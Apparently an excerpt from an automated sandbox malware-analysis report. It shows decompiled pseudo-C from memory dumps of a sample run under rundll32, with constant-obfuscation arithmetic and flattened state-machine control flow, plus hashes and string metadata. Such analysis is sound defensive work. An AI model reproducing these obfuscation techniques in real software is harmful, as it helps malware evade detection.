                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
                                                                                                                      				_t267 = 3;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
                                                                                                                      				 *(_t290 + 0x60) = 0x461ba6;
                                                                                                                      				_t268 = 0xd;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
                                                                                                                      				 *(_t290 + 0x68) = 0x8d460c;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
                                                                                                                      				 *(_t290 + 0x34) = 0x2e04ca;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
                                                                                                                      				 *(_t290 + 0x10) = 0xbf0768;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
                                                                                                                      				 *(_t290 + 0xc) = 0xd072fa;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
                                                                                                                      				 *(_t290 + 0x1c) = 0x9f8a7b;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
                                                                                                                      				 *(_t290 + 0x24) = 0xd784f2;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
                                                                                                                      				 *(_t290 + 0x48) = 0xfdbd11;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
                                                                                                                      				_push( *(_t290 + 0x3c));
                                                                                                                      				_push( *(_t290 + 0x64));
                                                                                                                      				_push( *(_t290 + 0x14));
                                                                                                                      				_push( *(_t290 + 0x20));
                                                                                                                      				_t269 = 0x1e;
                                                                                                                      				E00361310(_t269, _t290 - 0x20);
                                                                                                                      				E00361310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
                                                                                                                      				E00361310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
                                                                                                                      				E003508A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
                                                                                                                      				E003508A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
                                                                                                                      				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
                                                                                                                      				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
                                                                                                                      				_t261 = E0035E2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				return  ~_t261 + 1;
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: a949329b5cfb354484622402e33bec3083ede1cbd25f0cce20c321662792c30e
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 02B1DC7140038D9BDF59DF61C98A9CE3BA1FF44348F108219FE1A96260D7B5DA99CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0034B41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t136;
                                                                                                                      				intOrPtr _t140;
                                                                                                                      				void* _t146;
                                                                                                                      				signed int _t159;
                                                                                                                      				signed int _t160;
                                                                                                                      				signed int _t161;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t166;
                                                                                                                      
                                                                                                                      				_push(1);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(1);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t125);
                                                                                                                      				_v56 = 0xe46139;
                                                                                                                      				_t166 =  &(( &_v60)[7]);
                                                                                                                      				_v56 = _v56 + 0x2728;
                                                                                                                      				_v56 = _v56 ^ 0xfa290e75;
                                                                                                                      				_t163 = 0;
                                                                                                                      				_v56 = _v56 >> 4;
                                                                                                                      				_t146 = 0x6cc7f8c;
                                                                                                                      				_v56 = _v56 ^ 0x0fa05392;
                                                                                                                      				_v60 = 0xdd8405;
                                                                                                                      				_v60 = _v60 + 0xffff7544;
                                                                                                                      				_t159 = 0x13;
                                                                                                                      				_v60 = _v60 / _t159;
                                                                                                                      				_t160 = 0x4a;
                                                                                                                      				_v60 = _v60 * 0x44;
                                                                                                                      				_v60 = _v60 ^ 0x03147b15;
                                                                                                                      				_v40 = 0xb1f638;
                                                                                                                      				_v40 = _v40 / _t160;
                                                                                                                      				_v40 = _v40 + 0xfdde;
                                                                                                                      				_v40 = _v40 ^ 0x000bffc0;
                                                                                                                      				_v20 = 0xc1e326;
                                                                                                                      				_v20 = _v20 << 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0f1113ff;
                                                                                                                      				_v24 = 0x9dff8e;
                                                                                                                      				_v24 = _v24 << 5;
                                                                                                                      				_v24 = _v24 ^ 0x13be58e4;
                                                                                                                      				_v44 = 0x26f48e;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 ^ 0x0002f448;
                                                                                                                      				_v48 = 0xa078f9;
                                                                                                                      				_t161 = 0x1c;
                                                                                                                      				_v48 = _v48 * 0xe;
                                                                                                                      				_v48 = _v48 ^ 0x04e4b6a4;
                                                                                                                      				_v48 = _v48 ^ 0x0c2dbe80;
                                                                                                                      				_v52 = 0xb739f4;
                                                                                                                      				_v52 = _v52 ^ 0x18b1fcfd;
                                                                                                                      				_v52 = _v52 ^ 0x2d0276e6;
                                                                                                                      				_v52 = _v52 ^ 0x3502a25a;
                                                                                                                      				_v28 = 0x1e50a5;
                                                                                                                      				_v28 = _v28 / _t161;
                                                                                                                      				_v28 = _v28 ^ 0x0008472d;
                                                                                                                      				_v32 = 0x99faaf;
                                                                                                                      				_v32 = _v32 + 0xfffffde3;
                                                                                                                      				_v32 = _v32 ^ 0x0091a9c4;
                                                                                                                      				_v36 = 0x23e8f3;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x5a;
                                                                                                                      				_v36 = _v36 ^ 0x064f5444;
                                                                                                                      				_v8 = 0xf9c016;
                                                                                                                      				_v8 = _v8 | 0x76d0de1d;
                                                                                                                      				_v8 = _v8 ^ 0x76f7039e;
                                                                                                                      				_v12 = 0x650156;
                                                                                                                      				_v12 = _v12 >> 5;
                                                                                                                      				_v12 = _v12 ^ 0x000fa496;
                                                                                                                      				_v16 = 0x5361c2;
                                                                                                                      				_v16 = _v16 ^ 0x712c2ae6;
                                                                                                                      				_v16 = _v16 ^ 0x71790bc8;
                                                                                                                      				_t162 = _v4;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0x2367fc3) {
                                                                                                                      						if(_t146 == 0x555e5ab) {
                                                                                                                      							E003613B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
                                                                                                                      							_t166 =  &(_t166[9]);
                                                                                                                      							_t146 = 0xbed5482;
                                                                                                                      							_t163 =  !=  ? 1 : _t163;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0x6cc7f8c) {
                                                                                                                      								_t146 = 0x9230dbb;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0x9230dbb) {
                                                                                                                      									_t140 = E00349685(_t146);
                                                                                                                      									_t162 = _t140;
                                                                                                                      									if(_t140 != 0xffffffff) {
                                                                                                                      										_t146 = 0x2367fc3;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t146 != 0xbed5482) {
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										E00354DAD(_v36, _v8, _v4, _v12, _v16);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L7:
                                                                                                                      						return _t163;
                                                                                                                      					}
                                                                                                                      					_t136 = E0035FB2B(_v40,  &_v4, _v20, _v24, _t162);
                                                                                                                      					_t166 =  &(_t166[3]);
                                                                                                                      					if(_t136 == 0) {
                                                                                                                      						_t146 = 0x362db31;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t146 = 0x555e5ab;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L7;
                                                                                                                      					L15:
                                                                                                                      				} while (_t146 != 0x362db31);
                                                                                                                      				goto L7;
                                                                                                                      			}



























                                                                                                                      0x0034b629
                                                                                                                      0x0034b62e
                                                                                                                      0x0034b60f
                                                                                                                      0x0034b607
                                                                                                                      0x0034b5ff
                                                                                                                      0x0034b632
                                                                                                                      0x0034b63a
                                                                                                                      0x0034b63a
                                                                                                                      0x0034b6a5
                                                                                                                      0x0034b6aa
                                                                                                                      0x0034b6af
                                                                                                                      0x0034b6bb
                                                                                                                      0x00000000
                                                                                                                      0x0034b6b1
                                                                                                                      0x0034b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0034b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0034b6c0
                                                                                                                      0x0034b6c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: e69e39f5afdea35d071b5043708240d258c42fe146f486c0a6885898f834080e
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: F06140711083409FC789CF21988A82BFAF6FBC4358F54491DF5929A260C3B1DA49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035C38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t139;
                                                                                                                      				void* _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				void* _t157;
                                                                                                                      				void* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				void* _t173;
                                                                                                                      				signed int* _t175;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t173 = __edx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t139);
                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                      				_t175 =  &(( &_v80)[4]);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v16 = 0x6f933c;
                                                                                                                      				_t169 = 0;
                                                                                                                      				_v12 = 0xacafca;
                                                                                                                      				_t157 = 0x2c6486;
                                                                                                                      				_v40 = 0xf6c939;
                                                                                                                      				_t170 = 0xb;
                                                                                                                      				_v40 = _v40 / _t170;
                                                                                                                      				_v40 = _v40 ^ 0x00166f60;
                                                                                                                      				_v36 = 0x3062f8;
                                                                                                                      				_v36 = _v36 << 9;
                                                                                                                      				_v36 = _v36 ^ 0x60c5f010;
                                                                                                                      				_v56 = 0xc1f429;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 << 3;
                                                                                                                      				_v56 = _v56 ^ 0x5f429000;
                                                                                                                      				_v80 = 0x6a6c05;
                                                                                                                      				_v80 = _v80 | 0xf56e7669;
                                                                                                                      				_t171 = 0x32;
                                                                                                                      				_v80 = _v80 * 0x6f;
                                                                                                                      				_v80 = _v80 + 0xffff851e;
                                                                                                                      				_v80 = _v80 ^ 0x6ae37c08;
                                                                                                                      				_v60 = 0x567c0c;
                                                                                                                      				_v60 = _v60 + 0xd503;
                                                                                                                      				_v60 = _v60 * 0x3a;
                                                                                                                      				_v60 = _v60 ^ 0x13c3775e;
                                                                                                                      				_v64 = 0x59a2ac;
                                                                                                                      				_v64 = _v64 | 0x5ac15ac1;
                                                                                                                      				_v64 = _v64 ^ 0x94d4ce27;
                                                                                                                      				_v64 = _v64 ^ 0xce05e559;
                                                                                                                      				_v44 = 0x50d454;
                                                                                                                      				_v44 = _v44 * 0x6a;
                                                                                                                      				_v44 = _v44 ^ 0x2175139d;
                                                                                                                      				_v48 = 0x5a75fb;
                                                                                                                      				_v48 = _v48 * 0x57;
                                                                                                                      				_v48 = _v48 ^ 0x1eb14dac;
                                                                                                                      				_v24 = 0x99b258;
                                                                                                                      				_v24 = _v24 << 4;
                                                                                                                      				_v24 = _v24 ^ 0x099f4f84;
                                                                                                                      				_v76 = 0x853d43;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 | 0x5f7f2022;
                                                                                                                      				_v76 = _v76 ^ 0x5f753756;
                                                                                                                      				_v28 = 0xded29;
                                                                                                                      				_v28 = _v28 | 0xc4be8170;
                                                                                                                      				_v28 = _v28 ^ 0xc4b8b15a;
                                                                                                                      				_v32 = 0x545bb5;
                                                                                                                      				_v32 = _v32 + 0xe4b1;
                                                                                                                      				_v32 = _v32 ^ 0x005c5734;
                                                                                                                      				_v68 = 0xaed47d;
                                                                                                                      				_v68 = _v68 << 0xf;
                                                                                                                      				_v68 = _v68 | 0x1d211fc5;
                                                                                                                      				_v68 = _v68 / _t171;
                                                                                                                      				_v68 = _v68 ^ 0x02801ca0;
                                                                                                                      				_v52 = 0x7d6e82;
                                                                                                                      				_v52 = _v52 >> 0x10;
                                                                                                                      				_v52 = _v52 * 0x56;
                                                                                                                      				_v52 = _v52 ^ 0x0007d38d;
                                                                                                                      				_v72 = 0xcd2745;
                                                                                                                      				_v72 = _v72 ^ 0xed8bacb0;
                                                                                                                      				_v72 = _v72 + 0xffffdf8c;
                                                                                                                      				_v72 = _v72 | 0xe372d41f;
                                                                                                                      				_v72 = _v72 ^ 0xef7557f2;
                                                                                                                      				_v20 = 0x88cfe7;
                                                                                                                      				_v20 = _v20 >> 0xe;
                                                                                                                      				_v20 = _v20 ^ 0x0008c4a6;
                                                                                                                      				_t172 = _v20;
                                                                                                                      				while(_t157 != 0x2c6486) {
                                                                                                                      					if(_t157 == 0x2a600e7) {
                                                                                                                      						E00354DAD(_v68, _v52, _t172, _v72, _v20);
                                                                                                                      					} else {
                                                                                                                      						if(_t157 == 0xbcc0c39) {
                                                                                                                      							_t153 = E0034EEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
                                                                                                                      							_t175 =  &(_t175[7]);
                                                                                                                      							_t169 = _t153;
                                                                                                                      							_t157 = 0x2a600e7;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0xd3b3a19) {
                                                                                                                      								L9:
                                                                                                                      								if(_t157 != 0xb00d47) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t154 = E0035E938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
                                                                                                                      								_t172 = _t154;
                                                                                                                      								_t175 =  &(_t175[0xa]);
                                                                                                                      								if(_t154 != 0xffffffff) {
                                                                                                                      									_t157 = 0xbcc0c39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t169;
                                                                                                                      				}
                                                                                                                      				_t157 = 0xd3b3a19;
                                                                                                                      				goto L9;
                                                                                                                      			}
































                                                                                                                      0x0035c4c8
                                                                                                                      0x0035c4d0
                                                                                                                      0x0035c4d8
                                                                                                                      0x0035c4dc
                                                                                                                      0x0035c4e1
                                                                                                                      0x0035c4e9
                                                                                                                      0x0035c4f1
                                                                                                                      0x0035c4f9
                                                                                                                      0x0035c501
                                                                                                                      0x0035c509
                                                                                                                      0x0035c511
                                                                                                                      0x0035c519
                                                                                                                      0x0035c521
                                                                                                                      0x0035c529
                                                                                                                      0x0035c52e
                                                                                                                      0x0035c53c
                                                                                                                      0x0035c540
                                                                                                                      0x0035c548
                                                                                                                      0x0035c550
                                                                                                                      0x0035c55a
                                                                                                                      0x0035c55e
                                                                                                                      0x0035c566
                                                                                                                      0x0035c56e
                                                                                                                      0x0035c576
                                                                                                                      0x0035c57e
                                                                                                                      0x0035c586
                                                                                                                      0x0035c58e
                                                                                                                      0x0035c596
                                                                                                                      0x0035c59b
                                                                                                                      0x0035c5a3
                                                                                                                      0x0035c5a7
                                                                                                                      0x0035c5b9
                                                                                                                      0x0035c65c
                                                                                                                      0x0035c5bf
                                                                                                                      0x0035c5c5
                                                                                                                      0x0035c624
                                                                                                                      0x0035c629
                                                                                                                      0x0035c62c
                                                                                                                      0x0035c62e
                                                                                                                      0x00000000
                                                                                                                      0x0035c5c7
                                                                                                                      0x0035c5cd
                                                                                                                      0x0035c63d
                                                                                                                      0x0035c643
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035c649
                                                                                                                      0x0035c5cf
                                                                                                                      0x0035c5f4
                                                                                                                      0x0035c5f9
                                                                                                                      0x0035c5fb
                                                                                                                      0x0035c601
                                                                                                                      0x0035c603
                                                                                                                      0x00000000
                                                                                                                      0x0035c603
                                                                                                                      0x0035c601
                                                                                                                      0x0035c5cd
                                                                                                                      0x0035c5c5
                                                                                                                      0x0035c66d
                                                                                                                      0x0035c66d
                                                                                                                      0x0035c638
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: 67c623f3d0a0ce57e3a20b544d74f5b024b18b093facb8079256bf4038caf143
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: 4F711F710193409FC359CF61C54A91BBBF1FBC5B58F005A0DF6969A260D3B69A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E003604DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t132;
                                                                                                                      				void* _t135;
                                                                                                                      				void* _t148;
                                                                                                                      				signed int* _t151;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t147 = _a8;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t114);
                                                                                                                      				_v60 = 0xcc4817;
                                                                                                                      				_t151 =  &(( &_v96)[5]);
                                                                                                                      				_v60 = _v60 << 8;
                                                                                                                      				_v60 = _v60 ^ 0xcc47e657;
                                                                                                                      				_t148 = 0;
                                                                                                                      				_v68 = 0xe0ed25;
                                                                                                                      				_t135 = 0xdcadf3a;
                                                                                                                      				_v68 = _v68 | 0xce8f6412;
                                                                                                                      				_v68 = _v68 ^ 0xf3afd128;
                                                                                                                      				_v68 = _v68 ^ 0x3d42c27e;
                                                                                                                      				_v72 = 0x9a5a35;
                                                                                                                      				_v72 = _v72 >> 7;
                                                                                                                      				_t132 = 0x47;
                                                                                                                      				_v72 = _v72 * 0x61;
                                                                                                                      				_v72 = _v72 ^ 0x007dafa6;
                                                                                                                      				_v76 = 0x100281;
                                                                                                                      				_v76 = _v76 + 0xffff4995;
                                                                                                                      				_v76 = _v76 ^ 0x3bbc9aa1;
                                                                                                                      				_v76 = _v76 ^ 0x3bbd0b56;
                                                                                                                      				_v84 = 0xc6f502;
                                                                                                                      				_v84 = _v84 / _t132;
                                                                                                                      				_v84 = _v84 >> 1;
                                                                                                                      				_v84 = _v84 | 0x31db5564;
                                                                                                                      				_v84 = _v84 ^ 0x31df2935;
                                                                                                                      				_v88 = 0xec4ee3;
                                                                                                                      				_t44 =  &_v88; // 0xec4ee3
                                                                                                                      				_v88 =  *_t44 * 0x67;
                                                                                                                      				_v88 = _v88 >> 3;
                                                                                                                      				_v88 = _v88 | 0x81ddbea1;
                                                                                                                      				_v88 = _v88 ^ 0x8bf24dda;
                                                                                                                      				_v92 = 0xa20219;
                                                                                                                      				_v92 = _v92 + 0x973c;
                                                                                                                      				_v92 = _v92 | 0xc6adcdd8;
                                                                                                                      				_v92 = _v92 << 0xa;
                                                                                                                      				_v92 = _v92 ^ 0xbf7a6030;
                                                                                                                      				_v96 = 0x474fb;
                                                                                                                      				_v96 = _v96 + 0x4e06;
                                                                                                                      				_v96 = _v96 * 0x4d;
                                                                                                                      				_v96 = _v96 ^ 0xb0fe0c99;
                                                                                                                      				_v96 = _v96 ^ 0xb19d06b7;
                                                                                                                      				_v52 = 0x7e1eaf;
                                                                                                                      				_v52 = _v52 ^ 0x3657a741;
                                                                                                                      				_v52 = _v52 ^ 0x362fc7d5;
                                                                                                                      				_v80 = 0x982156;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_v80 = _v80 * 0x77;
                                                                                                                      				_v80 = _v80 * 0x51;
                                                                                                                      				_v80 = _v80 ^ 0x3002d3c9;
                                                                                                                      				_v56 = 0xfe8a73;
                                                                                                                      				_v56 = _v56 | 0x35e06d03;
                                                                                                                      				_v56 = _v56 ^ 0x35fae637;
                                                                                                                      				_v64 = 0x133817;
                                                                                                                      				_v64 = _v64 | 0xd744828f;
                                                                                                                      				_v64 = _v64 + 0x2427;
                                                                                                                      				_v64 = _v64 ^ 0xd75b1468;
                                                                                                                      				do {
                                                                                                                      					while(_t135 != 0x54f2717) {
                                                                                                                      						if(_t135 == 0x5ba048a) {
                                                                                                                      							_t128 = E0035B9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
                                                                                                                      							_t151 =  &(_t151[4]);
                                                                                                                      							__eflags = _t128;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t135 = 0x54f2717;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t135 == 0xb11095c) {
                                                                                                                      								E003564C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
                                                                                                                      								_t151 =  &(_t151[4]);
                                                                                                                      								_t135 = 0x5ba048a;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t135 != 0xdcadf3a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t135 = 0xb11095c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      					_t125 = E0035B9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
                                                                                                                      					_t151 =  &(_t151[4]);
                                                                                                                      					__eflags = _t125;
                                                                                                                      					_t148 =  !=  ? 1 : _t148;
                                                                                                                      					_t135 = 0xe1bb211;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t135 - 0xe1bb211;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				L11:
                                                                                                                      				return _t148;
                                                                                                                      			}
























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
